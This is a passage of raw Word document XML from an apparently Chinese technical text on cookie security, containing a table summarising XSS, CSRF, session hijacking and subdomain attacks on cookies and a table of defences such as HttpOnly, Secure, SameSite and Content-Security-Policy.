        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的攻击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294"/>
        <w:gridCol w:w="4038"/>
        <w:gridCol w:w="2512"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="33B52426" w14:textId="77777777" w:rsidTr="00501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20511E9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攻击方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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78CE485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原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="142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327AA17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危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="553182A2" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47389FF1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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>跨站脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="625CCE18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rFonts w:cs="Times New Roman"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恶意脚本窃取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document.cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1D5B5DFD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获取用户会话凭证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1697E4A3" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="676D64E1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rFonts w:cs="Times New Roman"/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CSRF</w:t>
            </w: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跨站请求伪造</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AC3F862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rFonts w:cs="Times New Roman"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诱导用户发起携带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Cookie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的恶意请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B1CAFF9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非授权转账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/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改密等操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="26B91A8B" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C2AFA62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会话劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77D47224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网络嗅探获取未加密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Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C2BC88A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冒充用户身份</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2BC10C74" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1297" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="263C1A1E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子域漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AC2BFA5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父域设置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Domain=.a.com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被子域恶意使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C3F1979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敏感数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28077B49" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42115B63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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Hlk200543963"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安全防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>最佳实践</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEBC3D3" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的安全防护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97"/>
        <w:gridCol w:w="4401"/>
        <w:gridCol w:w="2446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="156854AE" w14:textId="77777777" w:rsidTr="00501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5C44DD8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防护措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="248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6EB294A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配置示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13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69BE336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防护效果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="07DA8FCE" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5E854451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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>强制</w:t>
            </w:r>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2488" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="399ABE9A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rFonts w:cs="Times New Roman"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 xml:space="preserve">Secure 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属性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="008EF85C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防止网络嗅探</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="77F12187" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="66CB9605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rFonts w:cs="Times New Roman"/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禁止</w:t>
            </w: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JS</w:t>
            </w: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访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2488" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B472E66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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64CBC27D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阻断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XSS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窃取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3F217BA3" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78A03C5D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同站策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2488" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3638B399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SameSite=Lax (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默认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) / Strict</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="384EB924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缓解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CSRF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攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="45DE3C8E" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0290E2BA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敏感操作验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2488" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B56AA21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增加二次认证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(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短信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/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生物识别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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16C95C15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提升关键操作安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="04971278" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="79C5E13F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定期轮换密钥</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2488" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="375F2553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后端会话密钥定期更换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5827A94F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降低数据泄露影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7FD4EC3B" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32AC461C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内容安全策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2488" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="160A62B6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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Content-Security-Policy: default-src 'self'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="27799EFC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阻止恶意脚本注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2677869A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52737C77" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>黑客攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337AB5C0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网络安全基石：</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk200636713"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CIA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>三元组原则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="059B5C66" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
